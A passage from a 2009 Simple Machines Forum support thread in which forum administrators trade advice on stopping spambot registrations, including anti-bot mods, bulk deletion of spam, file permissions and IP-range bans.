As a note I decided to install the "reCAPTCHA for SMF" mod and as far as I know it's stopped the bots from registering and spamming.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Vampy on February 19, 2009, 03:28:01 AM
If this has been posted before than I apologise, as I have only recently seen this thread so did not use any of the options given here to stop the attack  - I thought it was just me LOL

When I was attacked I installed the Stop Spammer (http://custom.simplemachines.org/mods/index.php?mod=1547) mod and it worked - stopped the attack in it's tracks, with 50+ registration attempts blocked and several others set to awaiting approval.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: dreado on March 02, 2009, 03:29:22 AM
Does anyone have a way of removing accounts (and topics and posts) in bulk? Going through hundreds of pages of spam and removing each one at a time is a pain :(

Edit: What I think would be nice (if anyone wants to make a mod), is to have a check box next to each topic so admin can select multiple topics and then have the option to remove selected topics or remove topics and authors account.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on March 02, 2009, 08:31:20 AM
Quote from: dreado on March 02, 2009, 03:29:22 AM
Edit: What I think would be nice (if anyone wants to make a mod), is to have a check box next to each topic so admin can select multiple topics and then have the option to remove selected topics or remove topics and authors account.

That is possible in SMF 2.0. I don't think anyone will make something similar in a soon to be outdated software.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Aleksi "Lex" Kilpinen on March 02, 2009, 08:34:37 AM
Quote from: akyhne on March 02, 2009, 08:31:20 AM
Quote from: dreado on March 02, 2009, 03:29:22 AM
Edit: What I think would be nice (if anyone wants to make a mod), is to have a check box next to each topic so admin can select multiple topics and then have the option to remove selected topics or remove topics and authors account.

That is possible in SMF 2.0. I don't think anyone will make something similar in a soon to be outdated software.

Deleting multiple topics is possible in 1.x as well, but deleting the topic authors at the same time is not. Although, you can delete multiple user at once as well, but you just have to do it from the admin cp.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: dreado on March 02, 2009, 02:38:04 PM
Quote from: LexArma on March 02, 2009, 08:34:37 AM
Deleting multiple topics is possible in 1.x

How do you do this?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Aleksi "Lex" Kilpinen on March 02, 2009, 03:14:51 PM
Quote from: dreado on March 02, 2009, 02:38:04 PM
Quote from: LexArma on March 02, 2009, 08:34:37 AM
Deleting multiple topics is possible in 1.x

How do you do this?

1) From your profile -> Look and Layout Preferences -> Show quick-moderation on message index as
- Checkboxes
2) Go to the topic listing, and you will see checkboxes on the right side of topics.
3) Tick the topics you want to delete
4) From the pull down menu in the bottom, select "Remove selected" and press go.

:)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: dreado on March 02, 2009, 04:54:36 PM
Thanks :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Neighbours-Unite on March 03, 2009, 08:42:29 AM
I just had a look at those mods so we can keep those ******heads out
but with all of them it tels me this;
Compatible With: 1.1.4, 1.1.5, 1.1.7, 2.0 Beta 3 Public, 2.0 Beta 3.1 Public

I am running smf 1.1.8 any idea if those mods will work on that??
I'm asking because I'm not a coder and don't want to screw up.
( as I have done b4 )


GMax.  8)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on March 03, 2009, 08:49:34 AM
Which mods?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on March 03, 2009, 10:28:30 AM
If the mods claim compatibility with 1.1.7, they should work fine, you may just need to fool them into thinking it's 1.1.7. Almost anything compatible with 1.1.3 or newer should still work on 1.1.8.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: DollBaby on April 04, 2009, 01:47:16 PM
The "Questions" mod should work well on my 1.1.8 SMF+TP religious boards.  These boards are targeted more than the gaming boards I work on. 
I'll let yawl know.  :)

Thanks so much for what you guys do.  Hope to send send support soon.

www.studio414.net
www.meowworld.com
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: X-Seti on April 04, 2009, 03:57:37 PM
I have noticed this, from ip range (65.55.XXX.XXX)

They seem to be targeting report to moderator, just as well that does not work on my boards.

Thanks for the info.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Aleksi "Lex" Kilpinen on April 05, 2009, 07:18:41 AM
Quote from: X-Seti on April 04, 2009, 03:57:37 PM
I have noticed this, from ip range (65.55.XXX.XXX)
That is Microsoft IP -range, so probably a search engine doing it's job and following links on your board :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: sherriedb on April 10, 2009, 11:15:52 PM
I was wondering if these mods would work on 1.1.8.
    * Anti-Spam Verification Questions

    * Anti-Bot Registration Puzzles

    * Are You Human? (Anti-Bot Check)

    * reCAPTCHA for SMF
On the first page of this topic, it said up to 1.1.7
I guess I can assume from the post, a few before this, that they should be compatible with1.1.8

Now, on my forums, people do not like to register...many are just not that comfortable with doing that.
I have not been hit yet with heavy spammers, but want to avoid what I can.
Is there any way to implement these visual verifications or questions to guests?
I apologize, I know next to nothing about these things and I tried finding the answer, but could not.
Thank you for your patience.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Yigal on April 10, 2009, 11:25:58 PM
You can check the compatibility and in the modification pages.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: busterone on April 11, 2009, 01:17:13 AM
This one works for guest posting.
http://custom.simplemachines.org/mods/index.php?mod=907 (http://custom.simplemachines.org/mods/index.php?mod=907)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: sherriedb on April 11, 2009, 11:29:26 AM
Thanks busterone. I tried to install it but got error message.

Error in Package Installation:


At least one error was encountered during a test installation of this package. It is strongly recommended that you do not continue with installation unless you know what you are doing, and have made a backup very recently. This error may be caused by a conflict between the package you're trying to install and another package you have already installed, an error in the package, a package which requires another package that you don't have installed yet, or a package designed for another version of SMF.


   ./Sources/Register.php -Test Failed


That's exactly what I need...verification for guests, but looks like it doesn't work with 1.1.8
saw this at http://www.simplemachines.org/community/index.php?topic=189349.0;all (http://www.simplemachines.org/community/index.php?topic=189349.0;all)

I've searched, but can't find a mod for verification for guests that will work with 1.1.8
If you or anyone has any suggestions...thank you.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: busterone on April 11, 2009, 03:01:42 PM
I got the same error when I attempted installing it on another site that I manage besides my main site. I installed it anyway, ignoring the error, and then used the manual install instructions to locate the first set of code that must be replaced in register.php.  The install could not locate it, even though it was there. I replaced it with the code and was set. The second set was replaced as it should have been by the install.  It may be that you have another mod that was installed to register.php that is causing the problem. Often, when manually searching for a block of code, I have to shorten the search string to just the first line or so, and then check to verify the rest is there as well once it is found. Not an exact science for sure, but it works.
The site I am using it on is 1.1.8. It will work once the manual editing is taken care of. 
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: sherriedb on April 11, 2009, 03:37:19 PM
OK, I am going to install anyway and ...hate to ask this, but ...  ::) how do I manually edit the register.php?
where do i find the manual install instructions? I am a newbie, but I think I can find and replace code, if I know what to put and how to open the register.php.
THANK YOU!

I did click on "manual instructions" for 1.1.7 or 1.1.8 and nothing...said mod doesnt seem to support your SMF version

update: I just installed it on a test forum on another website and it worked. I have not changed any code. Do you think I dont need to?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: busterone on April 11, 2009, 04:01:57 PM
use the second one-  AdvancedVisualVerification_1-2_Fixed.tgz  , it will parse for 1.1.8.

use an ftp client to navigate to your /sources/register.php.   Make a backup copy first in case it goes wrong. Many ftp clients have an editor built in, or you can use something like notepad++ to edit a php file.
You also should be able to access and edit it through your host's control panel file explorer.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: sherriedb on April 11, 2009, 04:24:30 PM
AdvancedVisualVerification_1-2_Fixed.tgz -Installed.
ftp, opened register.php in notepad to edit.
What do I do now?  :o
where can I find what to type or replace?
I am reeeaaallly sorry...I just don't know.

MODIFIED MY MESSAGE:  I had to type in 1.1.3 to get the manual instructions.
I found and replaced code for first set...other 2 were already done.

I didn't see any difference...still have trouble with letters.
... letters don't always show up in verification code...sometimes only 2 or 4
If I click "listen" it will "say" all the letters or redo the image, and it will finally will show 5.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: busterone on April 11, 2009, 04:45:00 PM
look on this page. http://custom.simplemachines.org/mods/index.php?mod=907 (http://custom.simplemachines.org/mods/index.php?mod=907)
Click the circular checkbox on the second file- "fixed" next to this-
(124KB)  [29024] , then select version 1.1.8 on the drop down, and then click the parse button.   once the page loads, scroll down to the section for register.php. The original  code to look for and the replacement code will be there. There are 3 sections of code to be checked.  Search your file for the instance of each one and replace it if the install did not.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: sherriedb on April 11, 2009, 05:00:43 PM
OMG...I must have clicked 1.0.8  parse before. crap!
now I clicked 1.1.8
so i'm goin back in  8) and checking the code.
I have the correct mod installed already....etc.

I only have 2 other mods, ads and hide info center...I dont think any problem.
Thank you for your patience!

Modified My Message:
...replaced code in first for register.php, 2nd and 3rd already there...works fine except for letters.
THANK YOU!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: busterone on April 11, 2009, 05:09:57 PM
Your are welcome. Good luck.   :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: LexusDaisy on April 16, 2009, 01:56:08 AM
Newbie here with spam.  How to change age registration?

Do home made semi-pro mods compromise real security issues?

I saw one mod that had a big up datable database of spammers, much like virus defs.  Forget where tho. Anyone familiar?  Hard to install?  Does it work?  Buggy?

thanks,    Lee
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Aleksi "Lex" Kilpinen on April 16, 2009, 02:09:10 AM
Are You Human? (Anti-Bot Check) (http://custom.simplemachines.org/mods/index.php?mod=999), Visual Verification Options (http://custom.simplemachines.org/mods/index.php?mod=734) and Anti Spam (http://custom.simplemachines.org/mods/index.php?mod=1095).
They are all good options if you want to minimize the amount of bots and spam :)

I suggest you take a look at them, the Are you human? -mod is specifically aimed to stop registering,
the other two are more for stopping spam by guests or newly registered users.

Age limit for registration can be set in the AdminCP, Admin -> Registration -> Settings (if I remember correctly... )
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Aleksi "Lex" Kilpinen on April 16, 2009, 04:31:16 PM
Quote from: LexusDaisy on April 16, 2009, 01:56:08 AM
thanks,    Lee
Hi again Lee,

Did we get this solved earlier - or was there something you wanted to know still? :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Homesoil on April 17, 2009, 05:48:19 PM
I have been plagued with spammers for many months now which initially surprised me because I didnt advertise the link (its for local people) and we were relatively new!
Anyway after spending a long time sorting out the approval registrations on a regular basis I decided to install the "are you human?" mod.
I hope I am not speaking too soon but for the first time in months I have gone 3 days without ANY dodgy registrations.
I initially came back to the support forum to find out why, even though I had banned any registrations with the email @gmail.com that they still were able to register?
I couldn't find an answer but I did find a solution to my problem. :D
Can I ask a question here?
90% of registrations that I received were from gmail.......why would that be?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on April 17, 2009, 06:12:30 PM
Quote from: Homesoil on April 17, 2009, 05:48:19 PM
Can I ask a question here?
90% of registrations that I received were from gmail.......why would that be?

Because it has had its CAPTCHA broken now, and even if not, you can easily pay workers in India to solve them for you. Since a lot of legitimate people are using the service for mail, most people are loathe to ban the domain completely.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: busterone on April 17, 2009, 09:02:23 PM
I have been using the are you human mod set to high complexity, and have had only one spammer in months. That was a human that got in. he was out in less than 15 minutes too.  :D
Title: Are you human?
Post by: LexusDaisy on April 20, 2009, 11:00:54 PM
I think I need this mod, but am confused by several scenarios applying to the install.

I have SMF v 1.18, the default scheme, and no mods.  What do I need to do to install are you human?

Where do I find download and instructions. Must anything be changed on the server? I'm a little gunshy here and could use a little handholding.

After install, where do I find settings and controls for are you human?

Why do I get mostly only spam accounts installed, with maybe only 1 of 10 actually creating a post? Is this a good thing?   Mine is a religious board; are religious boards more heavily targeted?

Thx, any help/advise greatly appreciated.    Lee
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Aleksi "Lex" Kilpinen on April 21, 2009, 01:04:15 AM
Hi, you find the download here http://custom.simplemachines.org/mods/index.php?mod=999
You download the zip called Are_You_Human_v1.3.zip
You can use the forum's package manager to upload and install it, if no errors come up while at it - that's all for default theme and english.

For custom themes, and other languages you will need to make manual edits.
The theme specific edits you can find through the manual install instruction,
just follow the edits made to Themes/default/* and make all the same edits to your custom themes corresponding files. If a file named can not be found in your custom theme, ignore the edit as it has already been applied to your default theme, and the custom theme will use those edits then. :)

For languages, seek the edits made to Modifications.english.php and do the same edit's to Modifications.yourlanguage.php :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: unleashed1337 on April 21, 2009, 06:30:46 AM
thanks for the info though am safe of the Spamz!!!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: chrisb on April 21, 2009, 07:01:15 AM
we had been attacked and thank god i have my hosting company back 2 days before all these happened and in the last 24-48 hours has taken to restore and now back online ( yahoo)

what options are available to help to combat this from happen, i am not confidential on doing a forum upgrade to a newer version.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Aleksi "Lex" Kilpinen on April 21, 2009, 07:35:09 AM
Always keep your software up to date :)

How do I make the board safer against hacker attacks? (http://docs.simplemachines.org/index.php?topic=463)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: LexusDaisy on April 21, 2009, 06:52:18 PM
IS "Package Manager" pretty idiot proof in this case?

this is what Puts stuff om my TMD server, right?

think it is safe and ok for nervous green newbie like me to give Package Manager a try here?   

thx,    Lee  ???
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Aleksi "Lex" Kilpinen on April 22, 2009, 01:06:58 AM
It's safe :) It tells you in advance if there will be obvious errors in the install.
But just to make sure - you should always make a backup before installing modifications. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Yzzy on April 23, 2009, 10:54:02 AM
I know the copy info is required to use the smf system but is there any way it can be hiden from searches... When I used to use Nuke a few years ago it was the main way hackers could find vulnerable fora by doing a google for the nuke version they wanted to hack into.

That's when nuke stoped putting the version in the public view and only had it in admin...

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on April 23, 2009, 11:49:23 AM
You can remove the version number if you want, although it's awful security by obscurity. Once enough people hide public versions, script kiddies and bots will just throw every possible attack against the software. The best thing to do for safety is to keep updated with the latest version of SMF.

If you try to remove the version yourself (it's in the main index.php file), you will break the ability to install modifications, be alerted to software updates, and any other functions that require the checking of a version number. There is a Hide SMF Version (http://custom.simplemachines.org/mods/index.php?mod=1046) modification that will only hide the version for non-admin users, which means all the important version-checking functions will be intact.


By the way, on the note of automated attacks (as mentioned in the rant for that mod), I was checking the webstats for my personal website. Due to a really stupid error on my part, I lost all stats before April 20. However, in the past two or three days, the logs show attempts to attack my site through the CBSMS Mambo Module, The JUser Joomla! component, the Virtuemart Mambo and Joomla! component, what seems to be a WoWRoster modification for phpBB, the Flash Panaromac viewer component for Joomla!, the Joomla! SimpleBoard component, and the baBackup module for Mambo. Note that the site doesn't run phpBB, Joomla!, or Mambo. It never has.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Col on April 27, 2009, 12:14:48 PM
Quote from: dreado on March 02, 2009, 03:29:22 AM
Does anyone have a way of removing accounts (and topics and posts) in bulk? Going through hundreds of pages of spam and removing each one at a time is a pain :(

Edit: What I think would be nice (if anyone wants to make a mod), is to have a check box next to each topic so admin can select multiple topics and then have the option to remove selected topics or remove topics and authors account.

If memory serves, when deleting an account, you ahve th option of removing all posts and/or threads started by that member. So, do it the other way round - delete the offending accounts instead. ;)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Col on April 27, 2009, 12:28:06 PM
Quote from: Clara Listensprechen on February 12, 2009, 12:14:26 AM
Quote from: GusVeness on February 07, 2009, 06:08:18 PM
Hi,
I'm new to all this so please forgive my naivety.  I contracted with an individual to build my site. After building the site and getting it running, she disappeared. I'm quite happy with her work, but am getting overwhelmed with spam posts. I've muddled through and worked out how to delete and ban the offenders, but they still get through. I updated to version 1.1.8 but to no avail. Can anyone offer some suggestions?

Thanks

I'm fairly new to the ins and outs of Simple Machines forum software myself, but I have found a couple of simple measures to be effective (so far).  There is a mod somewhere on this board that permits you to set up a special Members category that will apply to all registrants when you select that option in the Admin center. It's a package called "Default Membergroup on Registration", and I set this up as a Restricted member group that can post only in one area and placed this area at the very bottom of the forum.  Only Restricted Members and Guests can access it.

I posted board rules down there and an Introductions section, and so far none of the spammers have shown interest in even posting spam down there. New registrations are down, but I'll have to admit that since I've started tracking them, I've noticed that if they're not total bots, their invasion attempts are at least semi-automated. 

On a totally different (non-SM board) that uses ReCaptcha, some spammers do get through.  I can confirm that they're humans; when I change Permissions By Boards periodically, I note in the Forum Error Log that this confuses the heck out of their automation, ha. Some of the error messages indicate a fairly sophisticated level of automation, but these same guys will manually attempt to engage the Help area--for troubleshooting, I guess.

I run only one board, though, and those who run...what, FIFTY boards?!?!...might find this to be still too labor-intensive.  I have also had success with IP bannings using wildcards but using WHOIS readouts on specific server ranges to ban just the servers.  Somebody originating at 194.8.X.X has been observed using different IP addresses but not outside the server's range of 194.8.0.0 - 194.8.255.255...therefore in banning the server I've banned a whole passel of retries without banning possible legit people.

This is what I did: http://www.simplemachines.org/community/index.php?topic=273816.msg1812081#msg1812081 (http://www.simplemachines.org/community/index.php?topic=273816.msg1812081#msg1812081)

Along the same lines, but you don't need the mod you mentioned - you can do it with existing permissions. All you need do is have the Newbie group set to less than 1 post, and set access permissions accordingly.

I used a mod that allows only the thread starters to view the thread they started - I applied this to the registration board. This meant that only the topic starter (and moderators) could view the thread, since guests and all members with a post count of 1 or more were in groups that could not access the registration board. This registration board did not add to post count of the new member (newbies did not have the right to post to other board), and when a moderator was satisfied that member was genuine, their post was moved to a proper forum board. Because the proper boards do increase post counts when a member posts, moving the thread automatically increased their post count - they would now have posting rights on all the boards. This system meant that any member of the team could give new members full acess - there was little waiting around.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: HEB XI 1 on May 03, 2009, 06:29:23 PM
Well, I managed to read the first 13 pages and then skipped to the end.  I am glad to know that I'm not the only one who was getting hit ... but it's odd that I was only hit on one of 5 sites?  1 x 1.1.6, 1 x 1.1.7, 2 x 1.1.8, and 1 x 2.0 b4.  Interestingly (to me) the one that got hit was on a different host than the others ...

Anyhoo - I had originally set the forum to Require Activation.  I had several bots get thru and noticed a few similar IPs, so started banning them (whack-a-mole!!).  Noticed the mail.ru as well as the gmail's, but unfortunately many of our legit members use gmail (the group leader being one - couldn't ban her!).

What finally worked for me was that I have Custom Actions Mod installed.  I then used that to run a PHP script that builds a form and posts the info to an admin board.  I ask for some basic info like real name and where they heard of the site.  I have the script installed on three boards and ask for other site-specific info depending on the site.

When someone registers, the inital group they are placed into has the same permissions as guests ... essentially none but read-only.  I tweaked the registration steps to take them to the first page of the form once they complete normal registration.  If they don't fill it out, no post is made and I go in once a week to delete those accounts.  If they do fill it out, an admin (we have 5) either approves them and moves them into a regular membership group, or denies them and deletes the account. 

I got rid of the activation step and set it to immediate registration in order to use this "activation" instead.  Essentially the same as Approval only except that now we have a little more info to base our decision on.  So far I haven't had any bots try to get past the additional registration questions.  Admittedly, this is a more labor intensive method for the admins, since they have to go change membergroups, but it has the added benefit of having a little extra info on people.

Kind of the same idea as the Custom Profile Fields mod and adding parts to the registration, but I am having issues with that mod that I wasn't able to get around yet.  I may look into it further because there are some things on there that would be helpful for other aspects.  In the end tho, I like having the personal approval/denial step.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: kaamaru on May 05, 2009, 08:30:05 PM
Thanks for the mods This wave has hit my forum in the last couple of days i have been getting lots of spam.

Here is an ip you should ban: 88.198.103.186
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Aleksi "Lex" Kilpinen on May 06, 2009, 01:24:29 AM
Quote from: calumks on May 05, 2009, 08:30:05 PM
Thanks for the mods This wave has hit my forum in the last couple of days i have been getting lots of spam.

Here is an ip you should ban: **
That looks to me ( on first sight at least ) like a legit IP...
And I'm not really in to banning by IP-addresses anyhow - I prefer trying to stop spammers before I have to get the old banhammer from the closet :P
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: CrankyOldguy on May 07, 2009, 10:34:15 PM
Quote from: Motoko-chan on April 23, 2009, 11:49:23 AM
By the way, on the note of automated attacks (as mentioned in the rant for that mod), I was checking the webstats for my personal website. Due to a really stupid error on my part, I lost all stats before April 20. However, in the past two or three days, the logs show attempts to attack my site through the CBSMS Mambo Module, The JUser Joomla! component, the Virtuemart Mambo and Joomla! component, what seems to be a WoWRoster modification for phpBB, the Flash Panaromac viewer component for Joomla!, the Joomla! SimpleBoard component, and the baBackup module for Mambo. Note that the site doesn't run phpBB, Joomla!, or Mambo. It never has.

That's what I see in my raw logs as well.  The skiddies ( I *love* the definition at Urban Dictionary (http://www.urbandictionary.com/define.php?term=skiddies)!  ;D ) don't bother to look for specific packages, they simply try everything in their tool kit, relevant or not.  They're hoping to find a package installed that someone forgot about with leaky old versions that they can exploit.  I've *never* seen an attack targeted at SMF used on our forums.

The 'terrorists' using Xrumer are another type of slime entirely.  They use both search engines as well as a 'cooperative database' that's collected by other Xrumer users to find forums to spam.  After you've been hit by one of them, the likelihood that you'll be hit by others goes WAY up.

Calling 'em terrorists is fair... I've seen forums completely buried by spambot posts.  Imagine YOUR forum getting 10,000 junk posts per day.  Some forums have disappeared due to that malign package that came out of Russia.


Off topic: that 88.198.103.186 IP posted by calumks a couple of posts earlier is a server farm in Deutschland.  When these spam attacks first started, I banned EVERY SERVER FARM that hit us... the whole CIDR it came from.  The number of attacks went down by around 95%, and I could handle it until we got reCaptcha in place.  OTHER THAN A PROXY, there's absolutely NO reason for a 'server farm' to be surfing MY forum.  We want people on our forum, not web spiders or spambots.
http://whois.domaintools.com/88.198.103.186  (use DENY FROM 88.198.0.0/16 if you want to be brutal about it.)

I've since unblocked some specific IPs within the banned server ranges, when I knew they were proxies AND they had a dedicated IP address.  There's a couple of TOR nodes on an InternetServiceTeam host, and I'll gouge my eyes out before I'll allow ANYTHING from that net range.  Sorry, Tor users.

Yep, banning by IP isn't a GOOD way to stop these attacks, but it's one way to reduce them, and it has the side benefit of shutting down a lot of the skiddies as well.  You merely have to be awake and aware when looking at the WHOIS data so that you don't start banning ISPs.  The Chinese botnet hits us 2 or 3 times per day, using subverted home PCs.  I don't ban any IPs coming from a valid ISP.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Frestorm on May 08, 2009, 10:51:44 PM
super
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Anton Radev on May 10, 2009, 07:38:34 AM
Hello!
Is there a list where I can find which files is need to be with changed specific CHMOD values?
I don`t want to change all the files together, because it would be kind of uncomfortable when I need to edit some files sometimes (theme etc..).
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on May 10, 2009, 01:13:58 PM
No, there isn't really because different servers need different permissions. Some won't work with files set to 400 and need 440. Others might need even 444.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MrPhil on May 10, 2009, 04:22:36 PM
Quote from: Anton Radev on May 10, 2009, 07:38:34 AM
Is there a list where I can find which files is need to be with changed specific CHMOD values?
I don`t want to change all the files together, because it would be kind of uncomfortable when I need to edit some files sometimes (theme etc..).

You will need to do some exploring and experimentation. In general, directories get 755 permissions, and files get 644. I don't think SMF has any shell scripts (bash, Perl, etc., with a "shebang" line) or compiled and linked binaries, but they would be 755. On some strangely set-up systems, PHP files may need to be 755.

Some directories and files need to be written to by SMF for various purposes (e.g., avatar upload). Depending on how the system is configured, and what system user ID numbers things like PHP and Apache run under, you may have to use different permissions for these directories and files. On my host, things are done to make PHP and Apache appear to be "me", so 755/644 allows SMF to write to directories and files as needed. Oddly configured systems may have Apache and PHP running in your "group", and might require 775 and 664 permissions. Apache and PHP might even be running as "others" ("world"), and require 777 and 666 permissions.

My advice is to start with the "standard" permissions (usually 755 and 644), and if SMF complains that it is unable to upload or write certain files ("not writable"), bump up the permissions to 775 and 664. If that still doesn't do the job, go to 777 and 666 as needed for specific directories and files. Just don't blindly chmod everything to 777, as some people will tell you to do. That's a probable security hazard, and some systems will even forbid access to directories or files that are "world writable" (e.g., 777 or 666).

Change 6 to 4 (or 7 to 5) to remove write access to a file (e.g., to make Settings.php unwritable, 444 instead of 644). If you make a file read-only (444), you can always chmod it back to a writable state (644) for editing or uploading a new version. Some systems may insist that you "0" out (no access at all) "others" or maybe "group" -- you'll have to discuss your host's specific requirements with them.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ModelBoatMayhem on May 13, 2009, 06:02:28 AM
Is it just me or have the attacks stopped in the last 2 days?Has a spam ISP been taken down?

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Leto Atreides II on May 19, 2009, 10:11:35 AM
Quote from: akyhne on February 12, 2009, 12:03:29 PM
I got daryy in yesterday. He's a bad dude. Actually the only spammer I ever got into any of my forums for a long time. He passed my avatar verification, so the guy must be human.
I just got him for the second time. He registers, makes a few inane posts, then later logs in and fills his signature with links advertising "World of Warcraft". To deal with this, instead of deleting his accounts or IP banning him - and each of his two accounts thus far have different IP addresses anyway - I simply keep a few links to a rival of WoW, "Sword of the New World". So Daryy winds up advertising for a company that rivals the one he's trying to promote. Seems like a suitable punishment for a spammer.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on May 19, 2009, 10:30:11 AM
LOL, nice touch as long as you are sure what you are doing.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Zero_Panzer on May 19, 2009, 05:13:06 PM
The one thing I found while examining my source from the site being hacked was an email [email protected]
Now, after googling it I found an underground hacking site that has hacks relating to simplemachine forums

hxxp://forum.darkc0de.com/index.php?

Perhaps its time to hit them where it hurts? >: (

hxxp://forum.darkc0de.com/index.php?action=userinfo&user=8026

User ID that got to my site

hxxp://forum.darkc0de.com/index.php?phrase=Simple+Machine&searchType=2&where=0&forum=&sDay=18&sMonth=6&sYear=2007&eDay=19&eMonth=5&eYear=2009&posterName=&action=search&searchGo=1

Also did a search for "Simple Machine" and got instant results

What more proof do you need that it is starting here?


Edit: Killed live links. Please think twice before posting live links to sites like that one on here - we have lots of inexperienced users who probably should not be visiting there.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on May 19, 2009, 05:24:31 PM
Quote from: Zero_Panzer on May 19, 2009, 05:13:06 PM
Also did a search for "Simple Machine" and got instant results

What more proof do you need that it is starting here?

That search brings up re-pastes of old exploit information that can be found in many places. Having posts about that on a forum of that type means nothing.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: coledavis on May 23, 2009, 09:13:12 AM
Just a note to say that although I'm here because of problems with spammers on my two forums, I'm speaking here as a resident of Russia. Yes, the place which you evidently consider to be populated only by cyber-criminals and robo-entrepreneurs. Just a note to say that many of us are ordinary internet users and also web site owners like yourselves. Ok, I realise that you have legitimate concerns over spam, but do remember that banning mail.ru - like banning gmail - has its human implications. Gmail would obviously be much more severe in terms of what is probably your target audience, but do at least consider that you just might have genuine Russian readers. (A lot of Russians learn English at a serious level. As you probably guess from my message, I am not in fact a Russian, but an Englishman in Russia, but I think my point is still valid.)

Oh by the way, I've got a fetching little avatar wearing a shapka (Russian winter hat); how do upload one for the forum?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on May 23, 2009, 09:28:19 AM
Quote from: coledavis on May 23, 2009, 09:13:12 AM
Oh by the way, I've got a fetching little avatar wearing a shapka (Russian winter hat); how do upload one for the forum?

I don't quite get that question and you will be more helped by creating a support question (http://www.simplemachines.org/community/index.php?board=9.0) for that one.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on May 23, 2009, 11:49:31 AM
Quote from: coledavis on May 23, 2009, 09:13:12 AM
Ok, I realise that you have legitimate concerns over spam, but do remember that banning mail.ru - like banning gmail - has its human implications.

Unfortunately, the number of illegitimate registrations using that domain far outstrips the number of legitimate. Given the proliferation of e-mail providers I don't think it would be very difficult to use an account on a provider that isn't quite so spam-infested.


Quote from: coledavis on May 23, 2009, 09:13:12 AM
Oh by the way, I've got a fetching little avatar wearing a shapka (Russian winter hat); how do upload one for the forum?

You have to have a minimum of 10 posts before you can change your profile data (avatar, signature, etc). It's an attempt to stop - or at least significantly slow - signature spam.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MrPhil on May 23, 2009, 01:40:50 PM
Quote from: akyhne on May 23, 2009, 09:28:19 AM
Quote from: coledavis on May 23, 2009, 09:13:12 AM
